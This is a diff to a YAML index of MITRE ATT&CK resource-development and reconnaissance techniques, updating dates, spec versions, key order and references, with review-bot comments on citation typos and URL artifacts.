- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587.004:
technique:
@@ -65225,7 +65889,7 @@ resource-development:
url: https://www.irongeek.com/i.php?page=videos/bsidescharm2017/bsidescharm-2017-t111-microsoft-patch-analysis-for-exploitation-stephen-sims
description: Stephen Sims. (2017, April 30). Microsoft Patch Analysis for
Exploitation. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:07:53.803Z'
name: Exploits
description: |-
Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)
@@ -65249,8 +65913,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1608.003:
technique:
@@ -65276,7 +65938,7 @@ resource-development:
url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
Certificates. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:47:46.409Z'
name: Install Digital Certificate
description: "Adversaries may install SSL/TLS certificates that can be used
during targeting. SSL/TLS certificates are files that can be installed on
@@ -65310,8 +65972,6 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1584.002:
technique:
@@ -65359,7 +66019,7 @@ resource-development:
Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.
By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019) Additionally, adversaries may leverage such control in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004) to redirect traffic to adversary-controlled infrastructure, mimicking normal trusted network communications.(Citation: FireEye DNS Hijack 2019)(Citation: Crowdstrike DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T21:22:13.578Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: DNS Server
x_mitre_detection: |-
@@ -65375,7 +66035,6 @@ resource-development:
- 'Domain Name: Passive DNS'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585:
technique:
@@ -65434,54 +66093,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
- type: attack-pattern
- created: '2020-10-01T01:56:24.776Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1588
- url: https://attack.mitre.org/techniques/T1588
- - source_name: NationsBuying
- description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
- Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
- url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
- - url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
- description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
- Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
- Human Rights Defender. Retrieved December 12, 2016.'
- source_name: PegasusCitizenLab
- - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
- Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
- source_name: DiginotarCompromise
- url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
- - source_name: FireEyeSupplyChain
- description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
- SunshopFireEye. Retrieved March 6, 2017.'
- url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
- - source_name: Analyzing CS Dec 2020
- url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
- description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
- Fun and Profit. Retrieved October 12, 2021.
- - source_name: Splunk Kovar Certificates 2017
- url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
- description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
- Certificates. Retrieved October 16, 2020.
- - source_name: Recorded Future Beacon Certificates
- url: https://www.recordedfuture.com/cobalt-strike-servers/
- description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
- Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-16T16:19:41.568Z'
name: Obtain Capabilities
description: |-
Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.
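Review bot: the T1588 object is removed wholesale here and re-emitted in the next hunk with keys in a different order, so the substantive changes (new `modified` stamp, refreshed Recorded Future URL and retrieval date, added `revoked`/`x_mitre_deprecated`) are buried in roughly a hundred lines of reordering. If this YAML is generated, emitting keys in a stable order (sorted, or the upstream STIX order) would keep future sync diffs reviewable; the same pattern recurs for T1587 and T1592 below.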
@@ -65492,22 +66107,66 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific Malware-as-a-Service (MaaS) offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain) Malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Certificate: Certificate Registration'
- 'Malware Repository: Malware Metadata'
- 'Internet Scan: Response Content'
- 'Malware Repository: Malware Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
+ created: '2020-10-01T01:56:24.776Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1588
+ external_id: T1588
+ - source_name: PegasusCitizenLab
+ description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
+ Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
+ Human Rights Defender. Retrieved December 12, 2016.'
+ url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
+ - source_name: FireEyeSupplyChain
+ description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
+ SunshopFireEye. Retrieved March 6, 2017.'
+ url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
+ - source_name: DiginotarCompromise
+ description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+ Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+ url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+ - source_name: Recorded Future Beacon Certificates
+ description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+ Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+ url: https://www.recordedfuture.com/research/cobalt-strike-servers
+ - source_name: Splunk Kovar Certificates 2017
+ description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+ Certificates. Retrieved October 16, 2020.
+ url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+ - source_name: Analyzing CS Dec 2020
+ description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+ Fun and Profit. Retrieved October 12, 2021.
+ url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+ - source_name: NationsBuying
+ description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
+ Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
+ url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1650:
technique:
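Review bot: the `FireEyeSupplyChain` description still reads `From Quartermaster to SunshopFireEye`, carried over verbatim from the removed block; the trailing `FireEye` is the publisher name run into the title and should read `Sunshop. FireEye.` (or the publisher dropped, since it is already the lead of the entry). The refreshed `Recorded Future Beacon Certificates` entry (new `/research/` URL, `Retrieved September 16, 2024`) is consistent with the Turla fix earlier in the patch.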
@@ -65570,37 +66229,38 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.007:
technique:
- modified: '2022-10-20T21:19:57.555Z'
+ modified: '2024-10-03T14:18:34.045Z'
name: Serverless
description: "Adversaries may compromise serverless cloud infrastructure, such
- as Cloudflare Workers or AWS Lambda functions, that can be used during targeting.
- By utilizing serverless infrastructure, adversaries can make it more difficult
- to attribute infrastructure used during operations back to them. \n\nOnce
- compromised, the serverless runtime environment can be leveraged to either
- respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
+ as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that
+ can be used during targeting. By utilizing serverless infrastructure, adversaries
+ can make it more difficult to attribute infrastructure used during operations
+ back to them. \n\nOnce compromised, the serverless runtime environment can
+ be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
traffic to an adversary-owned command and control server.(Citation: BlackWater
- Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated
- by these functions will appear to come from subdomains of common cloud providers,
- it may be difficult to distinguish from ordinary traffic to these providers.(Citation:
+ Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS
+ Apps Script Abuse 2021) As traffic generated by these functions will appear
+ to come from subdomains of common cloud providers, it may be difficult to
+ distinguish from ordinary traffic to these providers - making it easier to
+ [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation:
Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare
Workers)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
- x_mitre_detection: ''
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
+ x_mitre_contributors:
+ - Awake Security
x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Awake Security
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Internet Scan: Response Content'
type: attack-pattern
@@ -65624,11 +66284,14 @@ resource-development:
description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+ - source_name: GWS Apps Script Abuse 2021
+ description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+ Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
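Review bot: the new `GWS Apps Script Abuse 2021` url ends in `#google_vignette`, which is the fragment BleepingComputer's interstitial ad overlay appends to the address bar, not part of the article URL; strip it so the entry ends at `.../hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/` and does not carry what looks like a tracking artifact into the reference list. The rest of the hunk (spec version to 3.2.0, `spec_version` dropped) matches the other techniques.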
T1584.004:
technique:
@@ -65686,17 +66349,18 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.006:
technique:
- modified: '2023-03-13T20:35:52.302Z'
+ modified: '2024-08-14T15:03:56.383Z'
name: SEO Poisoning
description: |-
Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SEO)
To help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).(Citation: ZScaler SEO)(Citation: Atlas SEO)
+ In addition to internet search engines (such as Google), adversaries may also aim to manipulate specific in-site searches for developer platforms (such as GitHub) to deceive users towards [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) lures. In-site searches will rank search results according to their own algorithms and metrics such as popularity(Citation: Chexmarx-seo) which may be targeted and gamed by malicious actors.(Citation: Checkmarx-oss-seo)
+
Adversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.(Citation: MalwareBytes SEO)(Citation: DFIR Report Gootloader)
SEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.(Citation: ZScaler SEO)(Citation: Sophos Gootloader)
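Review bot: the added paragraph cites `(Citation: Chexmarx-seo)`, a misspelling of Checkmarx that is repeated in the matching `source_name` later in this patch, so it resolves, but it sits beside the correctly spelled `Checkmarx-oss-seo`; if the name is ever corrected it must change in both the citation and the `external_references` entry or the marker dangles. The same sentence has `popularity(Citation: Chexmarx-seo) which`, a citation marker mid-sentence with no punctuation before it, and `deceive users towards` is awkward. This is upstream ATT&CK text, so raise it there rather than patching the sync locally.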
@@ -65704,7 +66368,7 @@ resource-development:
- kill_chain_name: mitre-attack
phase_name: resource-development
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
- Vijay Lalwani
- Will Thomas, Equinix Threat Analysis Center (ETAC)
- Will Jolliffe
@@ -65718,7 +66382,7 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- PRE
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Internet Scan: Response Content'
type: attack-pattern
@@ -65751,11 +66415,18 @@ resource-development:
description: Wang, J. (2018, October 17). Ubiquitous SEO Poisoning URLs. Retrieved
September 30, 2022.
url: https://www.zscaler.com/blogs/security-research/ubiquitous-seo-poisoning-urls-0
+ - source_name: Chexmarx-seo
+ description: 'Yehuda Gelb. (2023, November 30). The GitHub Black Market: Gaming
+ the Star Ranking Game. Retrieved June 18, 2024.'
+ url: https://zero.checkmarx.com/the-github-black-market-gaming-the-star-ranking-game-fc42f5913fb7
+ - source_name: Checkmarx-oss-seo
+ description: Yehuda Gelb. (2024, April 10). New Technique to Trick Developers
+ Detected in an Open Source Supply Chain Attack. Retrieved June 18, 2024.
+ url: https://checkmarx.com/blog/new-technique-to-trick-developers-detected-in-an-open-source-supply-chain-attack/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.003:
technique:
@@ -65777,7 +66448,7 @@ resource-development:
description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
31, 2016.
source_name: Wikipedia Code Signing
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:19:50.018Z'
name: Code Signing Certificates
description: |-
Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
@@ -65795,47 +66466,10 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
- type: attack-pattern
- created: '2020-10-01T01:30:00.877Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1587
- url: https://attack.mitre.org/techniques/T1587
- - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
- description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
- Units. Retrieved July 18, 2016.
- source_name: Mandiant APT1
- - source_name: Kaspersky Sofacy
- description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
- 4). Sofacy APT hits high profile targets with updated toolset. Retrieved
- December 10, 2015.
- url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
- - source_name: Bitdefender StrongPity June 2020
- url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
- description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
- Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
- - source_name: Talos Promethium June 2020
- url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
- description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
- reach with StrongPity3 APT. Retrieved July 20, 2020.
- - source_name: Splunk Kovar Certificates 2017
- url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
- description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
- Certificates. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:31:17.270Z'
name: Develop Capabilities
description: |-
Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)
@@ -65844,21 +66478,57 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time.
Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Content'
- 'Malware Repository: Malware Metadata'
- 'Internet Scan: Response Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
+ created: '2020-10-01T01:30:00.877Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1587
+ external_id: T1587
+ - source_name: Kaspersky Sofacy
+ description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
+ 4). Sofacy APT hits high profile targets with updated toolset. Retrieved
+ December 10, 2015.
+ url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
+ - source_name: Splunk Kovar Certificates 2017
+ description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+ Certificates. Retrieved October 16, 2020.
+ url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+ - source_name: Mandiant APT1
+ description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
+ Units. Retrieved July 18, 2016.
+ url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
+ - source_name: Talos Promethium June 2020
+ description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
+ reach with StrongPity3 APT. Retrieved July 20, 2020.
+ url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
+ - source_name: Bitdefender StrongPity June 2020
+ description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
+ Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
+ url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1588.005:
technique:
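Review bot: the `Mandiant APT1` reference keeps the `fireeye.com/content/dam/...` PDF path and `Retrieved July 18, 2016`, while the FireEye supply-chain report in the T1588 hunk of this same patch now points at `mandiant.com`; worth checking this link still resolves and refreshing the `Retrieved` date if it was re-fetched, as was done for the Recorded Future entries.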
@@ -65898,7 +66568,7 @@ resource-development:
description: Zetter, K. (2019, October 3). Researchers Say They Uncovered
Uzbekistan Hacking Operations Due to Spectacularly Bad OPSEC. Retrieved
October 15, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:14:01.255Z'
name: Exploits
description: |-
Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)
@@ -65917,15 +66587,13 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1584.001:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-24T15:10:40.270Z'
name: Domains
description: |-
- Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019)
+ Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account, taking advantage of renewal process gaps, or compromising a cloud service that enables managing domains (e.g., AWS Route53).(Citation: Krebs DNS Hijack 2019)
Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)
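Review bot: the new example in the Domains description is written `AWS Route53`; the service name is `Route 53`. The description gains a new hijack vector (a compromised domain-management cloud service) and the next hunk bumps `x_mitre_version` 1.3 to 1.4, which is consistent. Separately, `x_mitre_attack_spec_version: 2.1.0` is removed for T1588.005 at the top of this hunk with no visible replacement, the same check as raised for T1585.001.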
@@ -65933,19 +66601,19 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_contributors:
+ - Jeremy Galloway
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.3'
- x_mitre_contributors:
- - Jeremy Galloway
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Domain Name: Passive DNS'
- 'Domain Name: Domain Registration'
@@ -65979,55 +66647,64 @@ resource-development:
url: https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
reconnaissance:
T1592:
technique:
- x_mitre_platforms:
- - PRE
+ modified: '2024-10-03T19:35:07.269Z'
+ name: Gather Victim Host Information
+ description: |-
+ Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
+
